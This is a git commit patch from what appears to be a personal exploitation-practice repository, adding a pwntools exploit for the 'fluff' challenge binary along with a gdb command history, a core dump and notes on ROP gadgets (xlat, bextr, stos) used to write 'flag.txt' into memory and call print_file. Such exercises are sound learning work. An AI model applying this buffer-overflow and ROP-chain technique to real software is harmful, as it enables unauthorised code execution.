From 4c25bd918847e914875e900285008eb3865ca8b6 Mon Sep 17 00:00:00 2001 From: Brett Weiland Date: Thu, 17 Dec 2020 19:39:54 -0600 Subject: new file: x86_64/fluff/exploit.py new file: x86_64/fluff/gadgets --- x86_64/fluff/.gdb_history | 239 ++++++++++++++++++++++++++++++++++++++++++++++ x86_64/fluff/core | Bin 0 -> 4292608 bytes x86_64/fluff/exploit.py | 49 ++++++++++ x86_64/fluff/gadgets | 44 +++++++++ 4 files changed, 332 insertions(+) create mode 100644 x86_64/fluff/.gdb_history create mode 100644 x86_64/fluff/core create mode 100755 x86_64/fluff/exploit.py create mode 100644 x86_64/fluff/gadgets (limited to 'x86_64/fluff') diff --git a/x86_64/fluff/.gdb_history b/x86_64/fluff/.gdb_history new file mode 100644 index 0000000..cfa1057 --- /dev/null +++ b/x86_64/fluff/.gdb_history @@ -0,0 +1,239 @@ +quit +quit +continue +nexti +nexti +info reg rdi +stepi +nexti +info reg rcx +nexti +info reg rbx +stepi +info reg rdx +inro reg rbx +info reg rbx +quit +stepi +continue +stepi +x rbx +info reg rbx +quit +conitnue +continue +stepi +info reg rbx +info reg rcx +quit +continue +stepi +info reg rbx +info reg rdx +quit +continue +stepi +info reg rbx +quit +continue +stepi +info reg rbx +quit +continue +stepi +info reg rbx +quit +continue +stepi +stepi +info reg rcx +stepi +info reg rbx +info reg rdx +quit +continue +stepi +info reg rbx +stepi +info reg rbx +quit +stepi +continue +stepi +info reg rbx +stepi +info reg rbx +quit +quit +continue +stepi +info reg rbx +quit +stepi +continue +stepi +info reg rbx +stepi +info reg rbx +quit +continue +stepi +info reg rbx +stepi +info reg rdx +quit +continue +stepi +info reg rbx +quit +continue +stepi +quit +continue +stepi +info reg rbx +quit +quit +continue +stepi +stepi +info reg rbp +stepi +info reg rax +stepi +info reg rax +stepi +info reg rdi +x/s 0x601be0 +stepi +x/s 0x601be0 +stepi +x/s 0x601be0 +stepi +x/s 0x601be0 +stepi +x/s 0x601be0 +stepi +x/s 0x601be0 +q +continue +stepi +x/s 0x601be0 +stepi +x/s 0x601be0 +stepi +x/s 0x601be0 +stepi +quit +conitnue +continue +continue +stepi +quit +x 0x0000000000400000 +x/c 0x0000000000400000 +x/c 0x00000000004003c4 +x/c 0x0000000000400000 +quit +continue +stepi +x/s 0x601be0 +x/c 0x0000000000400251 +stepi +stepi +x/s flag.txt +x/s 0x601be0 +quit +watch *0x601be0 + 7 +continue +x/s 0x601be0 +continue +x/s 0x601be0 +x/s 0x601be1 +x/s 0x601be0 +x/s 0x601be7 +continue +x/s 0x601be7 +x/s 0x601be0 +continue +quit +watch *0x601be4 +continue +x/s 0x601be0 +continue +x/s 0x601be0 +continue +x/s 0x601be0 +stepi +stepi +x/s $rdi +x/s 0x601be0 +quit +continue +x/s 0x601be0 +quit +break *0x00000000004006a3 +continue +context +stepi +x/s $rdi +stepi +quit +break *0x00000000004006a3 +continue +context +c/s 0x7ffdf0faba10 - 8 +x/s 0x7ffdf0faba10 - 8 +x/s 0x7ffdf0faba10 - 4 +x/s 0x7ffdf0faba10 - 16 +x/x 0x7ffdf0faba10 - 8 +x/x 0x7ffdf0faba10 +x/x 0x7ffdf0faba10 = 4 +x/x 0x7ffdf0faba10 - 4 +x/x 0x7ffdf0faba10 + 4 +context +info reg rdi +info reg rip +search +search 0x601be0 +search --qword 0x601be0 +search --qword 0x601be0 --writable +search --qword 0x0000000000400510 --writable +context +continue +stepi +continue +stepi +quit +break *0x00000000004006a3 +continue +stepi +continue +x/i 0x400639 +x/10i 0x400639 +quit +break *0x400639 +conitnue +continue +x/s 0x601be0 +continue +x/s 0x601be0 +continue +x/s 0x601be0 +stepi +quit +break *0x400639 +continue +continue +x/s 0x601be0 +continue +x/s 0x601be0 +continue +x/s 0x601be0 +stepi +stepi +x/s 0x601be0 +x/x 0x601be0 + 8 +x/x 0x601be0 + 9 +x/x 0x601be0 + 10 +quit diff --git a/x86_64/fluff/core b/x86_64/fluff/core new file mode 100644 index 0000000..ae36a67 Binary files /dev/null and b/x86_64/fluff/core differ diff --git a/x86_64/fluff/exploit.py b/x86_64/fluff/exploit.py new file mode 100755 index 0000000..cdf5de8 --- /dev/null +++ b/x86_64/fluff/exploit.py @@ -0,0 +1,49 @@ +#!/usr/bin/env python3 +from pwn import * + +letter_lookups = { + 'f' : 0x00000000004003c4, + 'l' : 0x0000000000400239, + 'a' : 0x00000000004003d6, + 'g' : 0x00000000004003cf, + '.' : 0x0000000000400251, + 't' : 0x0000000000400192, + 'x' : 0x0000000000400246} + +def write_str(dest, string, payload): + payload += p64(0x00000000004006a3) + payload += p64(dest) + for c in string: + payload += p64(0x40062a) + payload += p64(0x4000) # if things go wrong, check endian/order + payload += p64(letter_lookups[c] - 0x3ef2) + + payload += p64(0x0000000000400610) + payload += p64(0) + + payload += p64(0x400628) + + payload += p64(0x400639) + + return(payload) + + +prog = gdb.debug('./fluff', gdbscript=''' +break *pwnme + 151 +''' +) +payload = b'' +for c in range(40): + payload += b'a' + +payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload) +payload += p64(0x00000000004006a3) +payload += p64(0x601be0) # set rdi + +payload += p64(0x0000000000400510) + +payload += b"\n" +prog.sendline(payload) +sleep(1) +print(str(prog.recv(), 'UTF-8')) +prog.interactive() diff --git a/x86_64/fluff/gadgets b/x86_64/fluff/gadgets new file mode 100644 index 0000000..6c2f329 --- /dev/null +++ b/x86_64/fluff/gadgets @@ -0,0 +1,44 @@ +Memory bytes information +======================================================= +0x00000000004003c4 : 'f' +0x0000000000400239 : 'l' +0x00000000004003d6 : 'a' +0x00000000004003cf : 'g' +0x0000000000400000 : '.' +0x0000000000400192 : 't' +0x0000000000400246 : 'x' +0x0000000000400192 : 't' + +0x0000000000400610 : mov eax, 0 ; pop rbp ; ret + +400628: d7 xlat BYTE PTR ds:[rbx] #mov al, [rbx + al] requires rbx +*** +40062a: 5a pop rdx +40062b: 59 pop rcx +40062c: 48 81 c1 f2 3e 00 00 add rcx,0x3ef2 +400633: c4 e2 e8 f7 d9 bextr rbx,rcx,rdx + +#rdx is controller. +rdx bits 0-7: starting bit +rdx bits 8-15: length +*** +400639: aa stos BYTE PTR es:[rdi],al #moves al to rdi, then adds rdi + # requires rdi (check), al + + + +0000000000400510 : print_file@plt + + +0x00000000004006a3 : pop rdi ; ret + + +exploit: + +write to memory using al as letter + set al to zero + set rbx to memory location + rcx: (location - 0x3ef2) before bextr + rdx: 0x00 0x20 (from position zero, using 32 bits) + + -- cgit v1.2.3